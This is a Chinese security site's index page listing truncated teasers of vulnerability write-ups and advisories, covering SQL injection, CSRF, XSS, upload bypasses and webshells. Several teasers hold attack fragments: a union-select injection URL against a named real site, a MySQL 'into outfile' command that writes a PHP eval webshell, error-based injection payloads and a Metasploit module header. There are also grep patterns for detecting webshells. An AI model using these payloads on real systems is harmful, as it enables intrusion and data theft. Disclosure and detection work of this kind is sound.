mysql高级渗透经验 - 网站安全 - 自学php关注热度:14

concat(0x7C, hex(cc_number), 0x7C)concat(0x7C, ord(substring(#39;11#39;,1,1)), 0x7C)concat(0x7C,hex(cc_number),0x7C)concat(0x7C, ord(substring(cc_number,3,1)), 0x7C)加where条件and(select%2.....[详情]

自己理解的XSS和CSRF - 网站安全 - 自学php关注热度:97

照例还是要慢慢把notepad里写的东西方网上，虽然都属于低端文字这些都能在网上到处找得到的，但是我觉得还是有必要用自己的理解自己的语言梳理一遍，所以可能会有理解错误的地方..[详情]

Dlink DCS series CSRF修改管理员密码 - 网站安全 - 自关注热度:23

标题：Dlink DCS series CSRF Change Admin Password影响版本: DCS-900, DCS-2000, DCS-5300 and possibly other.作者: rigan - imrigan@gmail.com--问题描述:Dlink DCS是一个相机系列这些相机用.....[详情]

Limesurvey (PHPSurveyor v.1.91+ stable) 盲注及修复 - 网站关注热度:73

标题: LimeSurvey Blind SQL injection作者: TorTukiTu - OpenSphere影响版本: 1.91+ build 11804测试平台: php{cke_protected}{C}{cke_protected}{C}---------------------------------------------.....[详情]

BRIM < 2.0.0 SQL注射缺陷及修复 - 网站安全 - 自学关注热度:12

BRIM 2.0.0 SQL注射信息标题: BRIM 2.0.0 SQL Injection作者: ifnull www.2cto.com测试平台: Apache/2.2.3, PHP/5.1.6, MySQL 5.0.45 #65533;尽管它可以在任何环境下运行.Example uses My.....[详情]

Sagem F@ST 2604 (ADSL Router)CSRF缺陷及修复 - 网站安全关注热度:18

|__| | | |__| |__| |__| |_/ |__] |__| |__/| | |___ |___ | | | | | | | \_ |__] | | | \================================================================================####标.....[详情]

人人网照片评论的表结构泄漏及修复 - 网站安全关注热度:17

简要描述：用户评论照片时，输入特定字符可导致服务器返回未经处理的异常信息，其中包括数据库中相关表结构详细说明：在评论照片时，mac osx下safari中，输入mac自带表情符号时，导..[详情]

COCOON Counter统计程序漏洞总结 - 网站安全 - 自学关注热度:37

一、默认数据库：counter/_db/db_CC_Counter6.mdb也可直接打开：http://www.2cto.com /Counter/utilities/update.asp查看源文件，查找! ，就可以找到数据库的地址。程序的问题。二、暴路径漏洞利用探针h..[详情]

web渗透测试与信息收集基本流程 - 网站安全 - 自关注热度:43

攻击必须是有目的性的，首先确立为什么攻击？怎么去攻击？成功了之后该怎么办？被发现了怎么办？遇到特殊情况该怎么办？等等，计划好了从而实行攻击。事先踩点： 我们一般在渗..[详情]

Xss Exploits and Defense翻译(1-3) - 网站安全 - 自学ph关注热度:13

SYNGRESS的《Xss Exploits and Defense》这本书还不错，但是没有找到中文版，在学习过程中就大概翻译了一下。XSS攻击和防御第一章：跨站脚本基本原理本章主要内容：l 跨站脚本的历史l Web应..[详情]

The Uploader 2.0.4 (Eng/Ita)远程文件上传及代码执行关注热度:19

require #39;msf/core#39;class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, .....[详情]

Evading Content Security Policy with CRLF Injection - 网站安关注热度:26

Content Security Policy () was developed with the aim of reducing content injection attacks like Cross Site Scripting. CSP allows the developers to specify the permitted .....[详情]

傲游分站sql注入及修复 - 网站安全 - 自学php关注热度:17

简要描述：sql注入你们懂的,刚才写错了。详细说明：http://hd.maxthon.cn/skin/view.php?id=-111 union select 1,version(),3,4,user(),database(),7,8,9,10修复方案：你懂的作者adsltsee@乌云..[详情]

Mysql注入判断的一点思路 - 网站安全 - 自学php关注热度:18

有时候我们注入的时候很难用and 1=1和and 1=2来判断是否存在注入。。特别是像宽字节注入这种。。就比如说搜索型注入吧。。当存在宽字节注入时我们加上了%d5这样的。。数据库是查不到..[详情]

php源码审计之cookies 欺骗 - 网站安全 - 自学php关注热度:24

ebycms是一套手机音乐cms系统 直接上代码admin目录下的in.php !--?php require_once(#39;L:/wamp/www//fern.php#39;);Annotation(L:\\wamp\\www\\eby\\admin\\in.php_0);define(EBY_IN,TRUE);define(#3.....[详情]

php判断xss攻击 - 网站安全 - 自学php关注热度:42

//判断是否是xss攻击function _xss_check() { //urldecode解码已编码的URL 字符串 //解码 过后的url串 $temp = strtoupper(urldecode(urldecode($_SERVER[#39;REQUEST_URI#39;]))); if(strpos($temp.....[详情]

ForkCMS 3.2.5多重缺陷及修复 - 网站安全 - 自学php关注热度:18

标题: ForkCMS 3.2.5 Multiple Vulnerabilities作者: Ivano Binetti www.2cto.com软件下载地址 : http://www.fork-cms.com/download程序开发商: http://www.fork-cms.com/影响版本: 3.2.5 and lowe.....[详情]

MY动力系统（原自由动力）0day及修复 - 网站安全关注热度:18

测试http://www.2cto.com /Inc/syscode_article.asphttp://www.2cto.com /Inc/conn.asp注意有些是他自己把数据库改成了asa，我测试多个都是mdb可以下载下来默认后台/admin_login.asp漏洞成因还是配置不当所置，..[详情]

root权限导出一句话语句 - 网站安全 - 自学php关注热度:15

随便一个库执行：Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES(#39;?php @eval($_POST[dead])?#39;);select cmd from a into outfile #39;D:\ www.2cto.com .php#3.....[详情]

正则表达式查找webshell，一句话木马 - 网站安全关注热度:77

grep -r ndash;include=*.php lsquo;[^a-z]eval($_POSTrsquo; . grep.txtgrep -r ndash;include=*.php lsquo;file_put_contents(.*$_POST\[.*\]);rsquo; . grep.txt结合find . -name *.....[详情]

查找Centos Linux服务器上的WebShell后门 - 网站安全关注热度:18

服务器被挂马或被黑的朋友应该知道，黑客入侵web服务器的第一目标是往服务器上上传一个webshell，有了webshell黑客就可以干更多的事情。网站被挂马后很多人会束手无策，无从查起，其..[详情]

校讯通盲注及修复 - 网站安全 - 自学php关注热度:57

一个校讯通的盲注。。1000+表，懒得去跑详细说明：http://www.zh08009.com/jxt/xxt/sjhdxx.jsp?id=2珠海的。。漏洞证明：http://www.zh08009.com/jxt/xxt/sjhdxx.jsp?id=2修复方案：怎么修复你们懂。。作者 灰太..[详情]

php+mysql高级爆错注入 - 网站安全 - 自学php关注热度:20

之前想找个测试 没想到这有 可以测试下做个记录而已http://www.2cto.com /download/downpage/netarea/id/1600003#39;+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+inf.....[详情]

DirCMS任意文件读取及修复 - 网站安全 - 自学php关注热度:19

感觉时间真的过得真的很快，电脑一开一关一天就没了。不能这样下去，所以我打算抽出点时间来写博客和学习，记录一下自己的成长。不管是程序员、还是安全工程师，读别人的代码..[详情]

某短信群发平台数据库密码泄露及修复 - 网站安关注热度:18

为防止遭恶意利用，不公开关键词downtxt.asp?path=\db.asp 下载作者：CrackerMrXwww.2cto.com修复提示：..[详情]

28赌博网上传漏洞及修复 - 网站安全 - 自学php关注热度:19

为防止遭恶意利用，不公开关键词，请作者理解注册会员-上传头像.asp-GIF89a绕过www.2cto.com提示：作者：CrackerMrX..[详情]

SyndeoCMS <= 3.0 CSRF缺陷及修复 - 网站安全 - 自学关注热度:15

标题: SyndeoCMS = 3.0 CSRF Vulnerability作者: Ivano Binetti (http://ivanobinetti.com)程序开发网站: http://www.syndeocms.org/下载地址: http://sourceforge.net/projects/syndeocms影响版本: .....[详情]

almnzm 2.4 <= CSRF缺陷 (添加管理员)及修复 - 网站关注热度:13

标题: almnzm 2.4 = CSRF Vulnerability (Add Admin)开发者: almnzm.com作者: HaNniBaL KsA (HK) www.2cto.com hk@r00t-s3c.comCSRF 测试(添加一个新管理员) :centerbfont face=Tahoma .....[详情]

D-Link DSL-2640B (ADSL Router) CSRF缺陷及修复 - 网站安全关注热度:20

标题: D-Link DSL-2640B (ADSL Router) CSRF Vulnerability作者: Ivano Binetti www.2cto.com (http://ivanobinetti.com)程序网站: http://www.d-link.com影响版本: DSL-2640B测试平台: Firmware .....[详情]

PlumeCMS <= 1.2.4 CSRF缺陷及修复 - 网站安全 - 自学关注热度:17

标题: PlumeCMS = 1.2.4 CSRF Vulnerability作者: Ivano Binetti (http://ivanobinetti.com)下载地址: http://sourceforge.net/projects/pxsystem/files/latest/download?source=directory开发网站: .....[详情]